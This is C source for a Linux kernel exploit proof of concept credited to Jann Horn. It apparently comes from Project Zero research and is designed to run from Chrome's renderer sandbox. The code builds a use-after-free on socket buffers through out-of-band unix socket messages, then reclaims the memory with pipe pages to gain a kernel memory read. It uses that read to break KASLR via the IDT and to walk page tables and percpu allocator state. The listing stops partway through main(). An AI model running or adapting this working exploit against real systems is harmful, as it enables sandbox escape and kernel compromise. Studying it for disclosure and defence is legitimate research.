// by Jann Horn
// spraying-based strategy for https://project-zero.issues.chromium.org/423023990
// designed to run in Chrome renderer sandbox, where available syscalls are limited

#define _GNU_SOURCE
#include <pthread.h>
#include <stdint.h>
#include <err.h>
#include <unistd.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <sched.h>
#include <stddef.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sched.h>
#include <ctype.h>
#include <poll.h>
#include <inttypes.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>
#include <sys/un.h>
#include <linux/filter.h>
#include <linux/socket.h>
#include <linux/seccomp.h>
#include <linux/userfaultfd.h> // for dev only

// highly kernel-build-specific constants go here.
// assumptions about struct layouts and such are hardcoded further down.
static const unsigned long SYSMAP__asm_exc_divide_error = 0xffffffff81e01030;
static const unsigned long SYSMAP__vmemmap_base         = 0xffffffff825e2598;
static const unsigned long SYSMAP__page_offset_base     = 0xffffffff825e25a8;
static const unsigned long SYSMAP__init_top_pgt         = 0xffffffff82c22000;
static const unsigned long SYSMAP__pcpu_chunk_lists     = 0xffffffff82603b98;
static const unsigned long SYSMAP__pcpu_free_slot       = 0xffffffff82603bf8;
static const unsigned long SYSMAP__net_hotdata          = 0xffffffff82c09a00;
static const unsigned long SYSMAP____per_cpu_offset     = 0xffffffff825f2e20;
static const unsigned long SYSMAP__pgd_list             = 0xffffffff82c35db0;
static const unsigned long SYSMAP____pgtable_l5_enabled = 0xffffffff825e25b8;
static const unsigned long SYSMAP__kmalloc_caches       = 0xffffffff82603c40;
static const unsigned long SYSMAP__init_uts_ns          = 0xffffffff82e1c2a0;
static const unsigned long SYSMAP__cpu_tlbstate         = 0x0000000000035280;
static const unsigned long SYSMAP__pcpu_hot             = 0x00000000000351c0;
static const unsigned long SYSMAP__cached_stacks        = 0x0000000000021360;
static const unsigned long SYSMAP__do_syscall_64__RETADDR_FROM__x64_sys_call = 0xFFFFFFFF81CED1B2;
static const unsigned long OFFSET__page__refcount            = 0x34;
static const unsigned long OFFSET__page__page_type           = 0x30;
static const unsigned long OFFSET__pipe_inode_info__bufs     = 0x98;
static const unsigned long OFFSET__pipe_inode_info__ring_size= 0x5c;
static const unsigned long OFFSET__net_hotdata__skbuff_cache = 0x160;
static const unsigned long OFFSET__pcpu_hot__top_of_stack    = 0x18;
static const unsigned long CONFIG_NR_CPUS = 8192; // assumed to be power of two

static const unsigned long SIZE_16M = 0x01000000;

struct sk_buff {
  struct sk_buff *next;
  char pad0[0x20];
  /* 0x28 */
  char cbpad1[0x1c];
  unsigned int consumed;
  char cbpad2[0x10];
  /* 0x58 */
  char pad1[0x18];
  /* 0x70 */
  unsigned int len;
  /* 0x74 */
  unsigned int data_len;
  /* 0x78 */
  char pad2[0x0c];
  /* 0x84 */
  unsigned char from_ingress:1, nf_skip_egress:1, decrypted:1, slow_gro:1, csum_not_inet:1, unreadable:1;
  /* 0x85 */
  char pad3[0x3b];
  /* 0xc0 */
  unsigned int end;
  char pad4[4];
  /* 0xc8 */
  unsigned char *head;
  unsigned char *data;
};

struct skb_shared_info {
        unsigned char              flags;                /*     0   0x1 */
        unsigned char              meta_len;             /*   0x1   0x1 */
        unsigned char              nr_frags;             /*   0x2   0x1 */
        unsigned char              tx_flags;             /*   0x3   0x1 */
        short unsigned int         gso_size;             /*   0x4   0x2 */
        short unsigned int         gso_segs;             /*   0x6   0x2 */
        struct sk_buff *           frag_list;            /*   0x8   0x8 */
        char union10[0x8];
        unsigned int               gso_type;             /*  0x18   0x4 */
        unsigned int               tskey;                /*  0x1c   0x4 */
        int                        dataref;              /*  0x20   0x4 */
        unsigned int               xdp_frags_size;       /*  0x24   0x4 */
        void *                     destructor_arg;       /*  0x28   0x8 */
        //skb_frag_t                 frags[17];            /*  0x30 0x110 */
        /* size: 320, cachelines: 5, members: 14 */
};

struct pcpu_chunk {
  char pad0[0x40];
  /* 0x40 */
  unsigned long base_addr;
  /* 0x48 */
  char pad1[0x1c];
  /* 0x64 */
  int start_offset;
  /* 0x68 */
  int end_offset;
  /* 0x6c */
  char pad2[0xc];
  /* 0x78 */
  int nr_pages;
};

struct list_head {
  struct list_head *next, *prev;
};

struct ptdesc {
  unsigned long __page_flags;
  struct list_head pt_list;
  unsigned long __page_mapping;
  union {
    struct mm_struct *pt_mm;
  };
  //...
};

union slab_counters {
  unsigned long counters;
  unsigned int counters_short;
  struct {
    unsigned int inuse:16;
    unsigned int objects:15;
    unsigned int frozen:1;
  };
};
struct slab {
  unsigned long __page_flags;
  unsigned long slab_cache;
  char slab_lists_union[0x10];
  unsigned long freelist;
  union slab_counters counters;
};

struct pipe_buffer {
  void *page;
  unsigned int offset, len;
  void *ops;
  unsigned int flags;
  unsigned long private;
};

// perform syscall, and treat errors as fatal
#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count;) {
    unsigned char *orig_bytes = ((unsigned char*)_data) + byte_offset;
    unsigned char bytes[16];
    if (!memcpy(bytes, orig_bytes, 16)) {
      puts("** inaccessible page **\n");
      byte_offset = (byte_offset + 0x1000) & ~0xff0UL;
      continue;
    }
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
    byte_offset += 16;
  }
}

// enable Chrome renderer sandbox's seccomp filter to make sure we don't use
// blocked stuff
void enable_sandbox(void) {
  SYSCHK(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));
  int fd = SYSCHK(open("seccomp_filter.0", O_RDONLY));
  struct stat st;
  SYSCHK(fstat(fd, &st));
  char *seccomp_filter = malloc(st.st_size);
  assert(SYSCHK(read(fd, seccomp_filter, st.st_size)) == st.st_size);
  close(fd);
  struct sock_fprog fprog = {
    .len = st.st_size / sizeof(struct sock_filter),
    .filter = (void*)seccomp_filter
  };
  SYSCHK(syscall(__NR_seccomp, SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_LOG, &fprog));
}

// Figure out how much RAM+swap the machine has.
// Assumes that /proc/sys/vm/overcommit_memory is set to 0 (OVERCOMMIT_GUESS).
// See __vm_enough_memory().
unsigned long get_totalram_plus_swap(void) {
  // both inclusive
  unsigned long low = 0;
  unsigned long high = 0x0100000000000000;
  while (low != high) {
    // mid = round_up(midpoint(low, high), PAGE_SIZE)
    unsigned long mid = (high+low)/2;
    mid = (mid + 0xfff) & ~0xfffUL;

    void *res = mmap(NULL, mid, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if (res == MAP_FAILED) {
      high = mid - 0x1000;
    } else {
      SYSCHK(munmap(res, mid));
      low = mid;
    }
  }
  return low;
}

static unsigned long totalram_plus_swap;

static void drain_unmovable_pages(unsigned long unmovable_drain/*bytes*/) {
  // drain unmovable pages
  unsigned long drain_va_size = unmovable_drain/*bytes*/ / 0x1000/*->pages*/ * 0x200000/*->PTs*/;

  // create VMA with 2M alignment
  char *drain_area_orig = SYSCHK(mmap(NULL, drain_va_size+0x1ff000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0));
  char *drain_area_orig_end = drain_area_orig + drain_va_size+0x1ff000;
  char *drain_area = (char*)(((unsigned long)drain_area_orig + 0x1ff000) & ~0x1ff000UL);
  if (drain_area != drain_area_orig)
    SYSCHK(munmap(drain_area_orig, drain_area - drain_area_orig));
  if (drain_area + drain_va_size != drain_area_orig_end)
    SYSCHK(munmap(drain_area + drain_va_size, drain_area_orig_end - (drain_area + drain_va_size)));

  for (unsigned long off = 0; off < drain_va_size; off += 0x200000) {
    SYSCHK(madvise(drain_area, off+0x1000, MADV_RANDOM));
    *(volatile char *)(drain_area + off);
  }
}

static const unsigned long SKB__objs_per_slab = 32;
static const unsigned long SKB__cpu_partial_slabs = 4;
// drain partial slabs that contain preexisting allocations,
// and also drain percpu freelists in the process.
// after this, the active slab contains an unknown number
// of allocated objects.
static void drain_partial_skb_slab_pages() {
  unsigned long objs_to_alloc = (SKB__cpu_partial_slabs + 300) * SKB__objs_per_slab;
  int sockfds[2];
  bool new_sockfd = true;
  for (unsigned long i = 0; i < objs_to_alloc; i++) {
retry:;
    if (new_sockfd) {
      SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfds));
      new_sockfd = false;
    }
    int res = send(sockfds[1], "A", 1, MSG_DONTWAIT);
    if (res != 1) {
      // close the sending side to free up FD space a bit,
      // but keep the receiving side which the SKBs hang off of.
      close(sockfds[1]);
      new_sockfd = true;
      goto retry;
    }
  }
}

static int skb_off = -1;
static int uaf_pipe[2] = { -1, -1 };
static int uaf_fds[2];
/*
 * semi-arbitrary read.
 * can't read from locations covered by __check_object_size()!
 * but in exchange, it can tolerate unmapped kernel addresses.
 * returns byte value or -1 for "unmapped".
 */
static int sarb_readbyte(unsigned long kaddr) {
  //printf("sarb_readbyte(0x%lx) = ", kaddr);
  char old_page[0x1000];
  assert(SYSCHK(read(uaf_pipe[0], old_page, 0x1000)) == 0x1000);
  char new_page[0x1000] = {0};
  struct sk_buff *skb = (void*)(new_page + skb_off);
  skb->len = 100;
  skb->data_len = 0;
  skb->data = (void*)kaddr;
  assert(SYSCHK(write(uaf_pipe[1], new_page, 0x1000)) == 0x1000);

  unsigned char rbyte;
  int res = recv(uaf_fds[0], &rbyte, 1, MSG_OOB|MSG_PEEK);
  if (res == 1) {
    //printf("0x%hhx\n", rbyte);
    return rbyte;
  }
  assert(res == -1);
  assert(errno == EFAULT);
  //printf("[FAULT]\n");
  return -1;
}
static int sarb_read(void *res_, unsigned long addr, unsigned long len) {
  unsigned char *res = res_;
  for (int i=0; i<len; i++) {
    int b = sarb_readbyte(addr + i);
    if (b == -1)
      return -1;
    res[i] = b;
  }
  return 0;
}
static bool sarb_memeq_checked(void *expected_, unsigned long addr, unsigned long len) {
  unsigned char *expected = expected_;
  for (int i=0; i<len; i++) {
    int b = sarb_readbyte(addr + i);
    if (b == -1)
      errx(1, "sarb_memcmp_checked failed read");
    if (b != expected[i])
      return false;
  }
  return true;
}
static void sarb_read_checked(void *dst, unsigned long addr, unsigned long len) {
  if (sarb_read(dst, addr, len))
    errx(1, "unable to read from 0x%lx", addr);
}
static unsigned long sarb_readl_checked(unsigned long addr) {
  unsigned long res;
  sarb_read_checked(&res, addr, sizeof(res));
  return res;
}
static unsigned int sarb_read4_checked(unsigned long addr) {
  unsigned int res;
  sarb_read_checked(&res, addr, sizeof(res));
  return res;
}
static unsigned char sarb_read1_checked(unsigned long addr) {
  unsigned char res;
  sarb_read_checked(&res, addr, sizeof(res));
  return res;
}

static unsigned long kaslr_offset;
#define kernel_pgd (SYSMAP__init_top_pgt + kaslr_offset)
static unsigned long vmemmap_base, page_offset_base;
static unsigned long page_to_virt(unsigned long page) {
  assert((page - vmemmap_base) % 64 == 0);
  unsigned long pfn = (page - vmemmap_base) / 64;
  return page_offset_base + pfn * 0x1000;
}

static unsigned int __pgtable_l5_enabled;
static unsigned long mm_pgd;
static unsigned long uvirt_to_kvirt(unsigned long addr, int stoplevel) {
  addr = addr & ~0xfffUL;
  int levels = __pgtable_l5_enabled ? 5 : 4;
  unsigned long table_addr = mm_pgd;
  for (int i=levels-1; true; i--) {
    unsigned long entry_bits = 12 + 9*i;
    unsigned long idx = (addr >> entry_bits) & 0x1ff;
    unsigned long entry = sarb_readl_checked(table_addr + 8 * idx);
    if ((entry & 1) == 0)
      return -1UL;
    unsigned long target_phys = (entry & (~0xfffUL) & (~0x8880000000000000UL));
    unsigned long target_va = target_phys + page_offset_base;
    if (i != 0 && (entry & (1<<7)) != 0) {
      if (stoplevel != 0)
        return -1UL; // hugepage not supported
      return target_va + (((1 << (12+9*i))-1) & addr);
    }
    if (i == stoplevel) {
      return target_va;
    } else {
      table_addr = target_va;
    }
  }
}
static unsigned long anyvirt_to_phys(unsigned long addr) {
  return uvirt_to_kvirt(addr, 0) - page_offset_base;
}

static unsigned long *per_cpu_offset;
static unsigned long percpu_readl(unsigned long pcpu_addr) {
  while (1) {
    unsigned long cpu1 = sched_getcpu();
    unsigned long res1 = sarb_readl_checked(pcpu_addr + per_cpu_offset[cpu1]);
    unsigned long cpu2 = sched_getcpu();
    if (cpu1 != cpu2)
      continue;
    unsigned long res2 = sarb_readl_checked(pcpu_addr + per_cpu_offset[cpu1]);
    if (res1 != res2)
      continue;
    unsigned long cpu3 = sched_getcpu();
    if (cpu2 != cpu3)
      continue;
    return res1;
  }
}

#define ANON_VMA_NAMESTR "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

struct ramspam_entry {
  unsigned long kvirt;
  char *uvirt;
};
static int compare_ramspam(const void *a_, const void *b_) {
  const struct ramspam_entry *a = a_, *b = b_;
  if (a->kvirt < b->kvirt)
    return -1;
  if (a->kvirt > b->kvirt)
    return 1;
  return 0;
}

#define MAX_BUMPS_PER_ENTRY 4
struct bump_entry {
  struct ramspam_entry *ramspam;
  unsigned long kvirt;
  int num_bumps;
  int bumpsocks[MAX_BUMPS_PER_ENTRY];
};

static void prep_bump_socks(int bump_socks[2]) {
  char dummy;
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, bump_socks));
  SYSCHK(send(bump_socks[1], "A", 1, MSG_OOB)); // alloc A
  SYSCHK(recv(bump_socks[0], &dummy, 1, MSG_OOB));
  SYSCHK(send(bump_socks[1], "A", 1, MSG_OOB)); // alloc B
  SYSCHK(recv(bump_socks[0], &dummy, 1, MSG_OOB));
}

#define NUM_DRAIN_SOCKS 400
struct drainsocks {
  int sockfds[NUM_DRAIN_SOCKS];
  int idx;
};
static struct drainsocks drainsocks_normal = {};
//static struct drainsocks drainsocks_adjacent = {};
static int drain_one(struct drainsocks *drainsocks) {
  while (1) {
    int res = send(drainsocks->sockfds[drainsocks->idx], "A", 1, MSG_DONTWAIT);
    if (res != -1)
      return 0;

    // drain socket is full, use the next one
    drainsocks->idx++;
    if (drainsocks_normal.idx/* + drainsocks_adjacent.idx*/ >= NUM_DRAIN_SOCKS)
      errx(1, "drainsocks full :(");
    if ((drainsocks->idx & 1) == 0)
      SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, drainsocks->sockfds+2*drainsocks->idx));
    // try again
  }
}

static void *dummy_thread_fn(void *dummy) {
  while (1) pause();
}
static unsigned long bogostack_top_of_stack;
static int bogostack_ready_fd = -1, bogostack_continue_fd = -1;
static unsigned int getcpu_notls() {
  unsigned int p;
  asm volatile("lsl %[seg], %[p]":[p]"=a"(p):[seg]"r"(123));
  return p & 0xfff;
}
static char *uffd_mem;
static int stallpipe[2];
static int addr_leak_pipe[2];
static char bogothread_spray_data[sizeof(struct sockaddr_un)];
static char *mprotect_region;
static size_t mprotect_region_size;
static int fakeskb_stack_spray_socks[2];
static void *fakeskb_ready_detect_map;
static bool bogostack_want_clobber_target = false;
// careful, our TLS is shared with the main thread - errno is unreliable if used
// concurrently and sched_getcpu() will lie due to rseq
static int bogostack_thread_fn(void *dummyarg) {
  // find thread stack
  unsigned long pcpu_addr = SYSMAP__pcpu_hot + OFFSET__pcpu_hot__top_of_stack;
  //bogostack_top_of_stack = percpu_readl(pcpu_addr);
  while (1) {
    unsigned long cpu1 = getcpu_notls();
    unsigned long res1 = sarb_readl_checked(pcpu_addr + per_cpu_offset[cpu1]);
    unsigned long cpu2 = getcpu_notls();
    if (cpu1 != cpu2)
      continue;
    unsigned long res2 = sarb_readl_checked(pcpu_addr + per_cpu_offset[cpu1]);
    if (res1 != res2)
      continue;
    unsigned long cpu3 = getcpu_notls();
    if (cpu2 != cpu3)
      continue;
    bogostack_top_of_stack = res1;
    break;
  }

  eventfd_write(bogostack_ready_fd, 1);

  unsigned long dummy_ulong;
  while (1) {
    read(bogostack_continue_fd, &dummy_ulong, 8);

    if (bogostack_want_clobber_target) {
      /*
       * At the start of this syscall, the pipe contains capacity-1 pages.
       *
       * This syscall does the following:
       *
       * - write one page (making the pipe full, which will be observable by
       *   polling for POLLOUT)
       * - wait for one page to be removed from the pipe (which will become the
       *   pipe's tmp_page)
       * - add the tmp_page to the end of the pipe and write into it (this is
       *   where we may want to inject a delay)
       */
      write(addr_leak_pipe[1], mprotect_region+0x800, 0x3000);
    } else {
      struct iovec iov = {
        .iov_base = "A",
        .iov_len = 1
      };
      struct msghdr msg = {
        .msg_name = bogothread_spray_data,
        .msg_namelen = sizeof(bogothread_spray_data),
        .msg_iov = &iov,
        .msg_iovlen = 1,
        .msg_control = fakeskb_ready_detect_map,
        .msg_controllen = 1
      };
      sendmsg(fakeskb_stack_spray_socks[1], &msg, 0);
    }

    eventfd_write(bogostack_ready_fd, 1);
  }
}

static int bumper_thread_launch_fd = -1;
static int uaf_write_trigger_fds[2];
static void *bumper_thread_fn(void *dummy) {
  char write_pages[0x2000];
  uint64_t dummy_u64;
  SYSCHK(read(bumper_thread_launch_fd, &dummy_u64, sizeof(dummy_u64)));
  errno = 0;
  char dummy_char;
  int res = recv(uaf_write_trigger_fds[0], &dummy_char, 1, MSG_OOB|/*nerf for testing*/0);
  printf("bumper thread: recv() returned %d (%m)\n", res);
  return NULL;
}

static int mprotect_launch_fd = -1;
static uint64_t time_u64(void) {
  struct timespec ts;
  SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts));
  return ts.tv_sec * (uint64_t)1000000000 + ts.tv_nsec;
}
static void *slow_mprotect_thread_fn(void *dummy) {
  uint64_t dummy_u64;

  SYSCHK(read(mprotect_launch_fd, &dummy_u64, sizeof(dummy_u64)));
  uint64_t t1 = time_u64();
  SYSCHK(mprotect(mprotect_region, mprotect_region_size, PROT_READ));
  uint64_t t2 = time_u64();

  printf("slow_mprotect_thread_fn: delay = %lu ms [from %"PRIu64" to %"PRIu64"]\n", (t2-t1) / (1000*1000), t1, t2);
  return NULL;
}

static void tlb_flush() {
  // x86-64 Linux implements TLB flushes in flush_tlb_mm_range().
  // It promotes a flush to a whole-process flush if
  //
  //     ((end - start) >> stride_shift) > tlb_single_page_flush_ceiling
  //
  // where tlb_single_page_flush_ceiling is 33.
  // If we unmap a range that only contains more than 33 zeropage entries,
  // all the unmap operations should be aggregated without intermediate flushes.
  // By creating a VMA that is smaller than 512 entries and surrounded by
  // guards, we can be sure no THP stuff is going to get in our way.
  void *p = SYSCHK(mmap(NULL, 64*0x1000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  SYSCHK(mprotect(p+0x1000, 62*0x1000, PROT_READ));
  for (int i=1; i<63; i++)
    *(volatile char *)(p+i*0x1000);
  SYSCHK(munmap(p, 64*0x1000));
}

#define TARGET_OBJECT_OFF 0xa00

#ifdef LD_PRELOAD_BUILD
int exploit_main(void) {
#else
int main(void) {
#endif
  char dummy;
#ifdef TRACE
  int pti_fd = SYSCHK(open("/proc/pagetypeinfo", O_RDONLY));
  int meminfo_fd = SYSCHK(open("/proc/meminfo", O_RDONLY));
#endif

  setbuf(stdout, NULL);
#ifndef LD_PRELOAD_BUILD
  // save changes in case we're about to crash the process/system
  sync();
#endif

#ifndef LD_PRELOAD_BUILD
#if 1
  enable_sandbox();
  printf("Chrome-equivalent sandbox engaged\n");
#else
  printf("SANDBOX WAS NOT ENABLED!!!!!!!!!!!!!!!!\n");
#endif
#endif

  printf("running in PID %d\n", getpid());
  unsigned long totalram_plus_swap = get_totalram_plus_swap();
  printf("RAM+swap: %lu MiB\n", totalram_plus_swap / (1024UL*1024UL));

#if 0
  // DETERMINISTIC FAULT TESTING
  SYSCHK(pipe(stallpipe));
  uffd_mem = SYSCHK(mmap(NULL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  int uffd = SYSCHK(syscall(__NR_userfaultfd, 0));
  struct uffdio_api api = { .api = 0xAA, .features = 0 };
  SYSCHK(ioctl(uffd, UFFDIO_API, &api));
  struct uffdio_register uffd_reg = {
    .range = {
      .start = (unsigned long)uffd_mem,
      .len = 0x1000
    },
    .mode = UFFDIO_REGISTER_MODE_MISSING
  };
  SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &uffd_reg));
#endif
#if 0
  write(stallpipe[1], uffd_mem, 1);
  exit(1);
#endif

  // early setup
  static const int NUM_PIPES = 256;
  int pipes[NUM_PIPES][2];
  for (int i=0; i<NUM_PIPES; i++)
    SYSCHK(pipe(pipes[i]));
  char two_pages[0x2000] = {0};
  for (unsigned long off = 0; off < 0x2000; off += 256) {
    struct sk_buff *skb = (void*)(two_pages + off);
    skb->len = 2000;
    skb->data_len = 0;
    if (off < 0x1000) {
      skb->data = (void*)"A2345678";
    } else {
      skb->data = (void*)"B2345678";
    }
  }

  // do this first, we can still migrate at this point
  drain_unmovable_pages(totalram_plus_swap / 100 * 10);

#ifdef TRACE
  {
    char dumptext[0x2000];
    int dumplen = SYSCHK(read(pti_fd, dumptext, sizeof(dumptext)));
    SYSCHK(write(1, dumptext, dumplen));
    dumplen = SYSCHK(read(meminfo_fd, dumptext, sizeof(dumptext)));
    SYSCHK(write(1, dumptext, dumplen));
  }
#endif

  // now we don't want to migrate/preempt anymore (TODO: check via rseq)
  drain_partial_skb_slab_pages();
  // Allocate 1.25 MiB of SKBs for flushing; that's 10240 SKBs.
  // Each socket can hold 256 packets, so this requires 40 sockets.
  // In addition, min_partial(5) slabs must be on the node partial list,
  // which requires at least another 5*32=160 SKBs plus padding.
  int flush_skb_fds[41];
  for (int i=0; i<41; i++) {
    int sockfds[2];
    SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfds));
    flush_skb_fds[i] = sockfds[0];
    for (int j = 0; j < 256; j++)
      SYSCHK(send(sockfds[1], "A", 1, MSG_DONTWAIT));
    close(sockfds[1]);
  }

  // make sure the active slab is completely available
  int active_fill_fds[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, active_fill_fds));
  for (int i=0; i<SKB__objs_per_slab; i++)
    SYSCHK(send(active_fill_fds[1], "A", 1, MSG_DONTWAIT));
  for (int i=0; i<SKB__objs_per_slab; i++)
    SYSCHK(recv(active_fill_fds[0], &dummy, 1, MSG_DONTWAIT));

  // set up dangling pointer
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, uaf_fds));
  SYSCHK(send(uaf_fds[1], "A", 1, MSG_OOB)); // alloc A
  SYSCHK(recv(uaf_fds[0], &dummy, 1, MSG_OOB));
  SYSCHK(send(uaf_fds[1], "A", 1, MSG_OOB)); // alloc B
  SYSCHK(recv(uaf_fds[0], &dummy, 1, MSG_OOB));
  SYSCHK(send(uaf_fds[1], "A", 1, MSG_OOB)); // alloc C

  // replace active slab
  for (int i=0; i<SKB__objs_per_slab; i++)
    SYSCHK(send(active_fill_fds[1], "A", 1, MSG_DONTWAIT));
  for (int i=0; i<SKB__objs_per_slab; i++)
    SYSCHK(recv(active_fill_fds[0], &dummy, 1, MSG_DONTWAIT));

  // fill up min_partial slabs
  close(flush_skb_fds[40]);

  SYSCHK(recv(uaf_fds[0], &dummy, 1, 0)); // free A, C[DANGLING]; put uaf slab on pcpu freelist
  recv(uaf_fds[0], &dummy, 1, MSG_DONTWAIT); // free B; make uaf slab fully unused

  // flush slub and page alloc pcpu
  for (int i=0; i<40; i++)
    close(flush_skb_fds[i]);

  // try to realloc with 256 pipes each holding 2 pages (2 MiB)
  for (int i=0; i<NUM_PIPES; i++) {
    assert(SYSCHK(write(pipes[i][1], two_pages, 0x2000)) == 0x2000);
  }

  // find the pipe
  char rbyte;
  assert(SYSCHK(recv(uaf_fds[0], &rbyte, 1, MSG_OOB|MSG_PEEK)) == 1);
  assert(rbyte == 'A' || rbyte == 'B');
  printf("realloc seems to have worked, rbyte=%c, locating page...\n", rbyte);
  char scratch_page[0x1000];
  for (int i=0; i<NUM_PIPES; i++) {
    if (skb_off != -1) {
      close(pipes[i][0]);
      close(pipes[i][1]);
      continue;
    }

    if (rbyte == 'B') {
      // switch the order of the pages around
      assert(SYSCHK(read(pipes[i][0], scratch_page, 0x1000)) == 0x1000);
      assert(SYSCHK(write(pipes[i][1], scratch_page, 0x1000)) == 0x1000);
    }
    // now the first page is the one we want.
    assert(SYSCHK(read(pipes[i][0], scratch_page, 0x1000)) == 0x1000);
    assert(SYSCHK(read(pipes[i][0], scratch_page, 0x1000)) == 0x1000);

    char small_letters[] = "abcdefghijklmnopqrstuvwxyz";
    for (unsigned long off = 0; off < 0x1000; off += 256) {
      struct sk_buff *skb = (void*)(scratch_page + off);
      skb->len = 2000;
      skb->data_len = 1000;
      skb->data = (void*)(small_letters + off/256);
    }
    assert(SYSCHK(write(pipes[i][1], scratch_page, 0x1000)) == 0x1000);

    assert(SYSCHK(recv(uaf_fds[0], &rbyte, 1, MSG_OOB|MSG_PEEK)) == 1);
    if (rbyte != 'A' && rbyte != 'B') {
      printf("  found a hit ('%c')\n", rbyte);
      assert(rbyte >= 'a' && rbyte <= 'p');
      skb_off = 256 * (rbyte - 'a');
      uaf_pipe[0] = pipes[i][0];
      uaf_pipe[1] = pipes[i][1];
    } else {
      close(pipes[i][0]);
      close(pipes[i][1]);
    }
  }
  if (skb_off == -1)
    errx(1, "nope, realloc failed somehow after all, can't find it???");
  printf("got controlled SKB, semi-arbitrary read ready\n");

  // read the entry for #DE from the IDT
  struct gate_struct {
    uint16_t offset_low;
    uint16_t segment;
    uint16_t bits;
    uint16_t offset_middle;
    uint32_t offset_high;
    uint32_t reserved;
  } idt_entry;
  if (sarb_read(&idt_entry, /*CPU_ENTRY_AREA_RO_IDT_VADDR*/0xfffffe0000000000, sizeof(idt_entry)))
    errx(1, "unable to read IDT entry");
  unsigned long divide_error_handler_addr =
      (((uint64_t)idt_entry.offset_high  ) << 32) |
      (((uint64_t)idt_entry.offset_middle) << 16) |
      (((uint64_t)idt_entry.offset_low   ) <<  0);
  printf("#DE handler at 0x%lx\n", divide_error_handler_addr);
  kaslr_offset = divide_error_handler_addr - SYSMAP__asm_exc_divide_error;
  printf("KASLR offset: 0x%lx\n", kaslr_offset);
  assert((kaslr_offset & 0xfff) == 0);

  vmemmap_base = sarb_readl_checked(SYSMAP__vmemmap_base + kaslr_offset);
  printf("VMEMMAP_START = 0x%lx\n", vmemmap_base);
  page_offset_base = sarb_readl_checked(SYSMAP__page_offset_base + kaslr_offset);
  printf("__PAGE_OFFSET = 0x%lx\n", page_offset_base);

  per_cpu_offset = calloc(CONFIG_NR_CPUS, sizeof(unsigned long));
  sarb_read_checked(per_cpu_offset, SYSMAP____per_cpu_offset + kaslr_offset, CONFIG_NR_CPUS*sizeof(unsigned long));

  // find mm_struct of current process
  unsigned long mm = percpu_readl(SYSMAP__cpu_tlbstate);
  printf("mm_struct at 0x%lx\n", mm);

  // find page tables of current process
  {
    unsigned long head = SYSMAP__pgd_list + kaslr_offset;
    unsigned long cur = head;
    while (1) {
      cur = sarb_readl_checked(cur);
      if (cur == head)
        errx(1, "unable to find pgd for our mm");
      struct ptdesc *p = (void*)(cur - offsetof(struct ptdesc, pt_list));
      unsigned long p_mm = sarb_readl_checked((unsigned long)&p->pt_mm);
      if (p_mm == mm) {
        mm_pgd = page_to_virt((unsigned long)p);
        break;
      }
    }
  }
  printf("PGD is at 0x%lx\n", mm_pgd);

  __pgtable_l5_enabled = sarb_read4_checked(SYSMAP____pgtable_l5_enabled + kaslr_offset);
  printf("paging levels: %d\n", __pgtable_l5_enabled?5:4);


  // find slab percpu data
  unsigned long skbuff_cache = sarb_readl_checked(SYSMAP__net_hotdata + OFFSET__net_hotdata__skbuff_cache + kaslr_offset);
  // see __kmalloc_index()
  unsigned long kmalloc_192_acc_cache = sarb_readl_checked(SYSMAP__kmalloc_caches + (14*3/*KMALLOC_CGROUP*/ + 2)*sizeof(void*) + kaslr_offset);

  // dump percpu allocator state
  unsigned long pcpu_chunk_lists = sarb_readl_checked(SYSMAP__pcpu_chunk_lists + kaslr_offset);
  unsigned long pcpu_free_slot = sarb_read4_checked(SYSMAP__pcpu_free_slot + kaslr_offset);
  printf("percpu regions (pcpu_free_slot = %lu)\n", pcpu_free_slot);

  // locate percpu state of slabs
  unsigned long skbuff_pcpu = 0;
  unsigned long kmalloc_192_acc_pcpu = 0;
  while (!skbuff_pcpu || !kmalloc_192_acc_pcpu) {
    for (unsigned int slot = 0; slot < pcpu_free_slot; slot++) {
      //printf("  pcpu_chunk_lists[%u]\n", slot);
      unsigned long list_start_ptr = pcpu_chunk_lists + 0x10 * slot;
      unsigned long elem = list_start_ptr;
      while (1) {
        elem = sarb_readl_checked(elem);
        if (elem == list_start_ptr)
          break;
        printf("    0x%lx: ", elem);
        struct pcpu_chunk chunk;
        sarb_read_checked(&chunk, elem, sizeof(chunk));
        // from pcpu_addr_in_chunk()
        unsigned long start_addr = chunk.base_addr + chunk.start_offset;
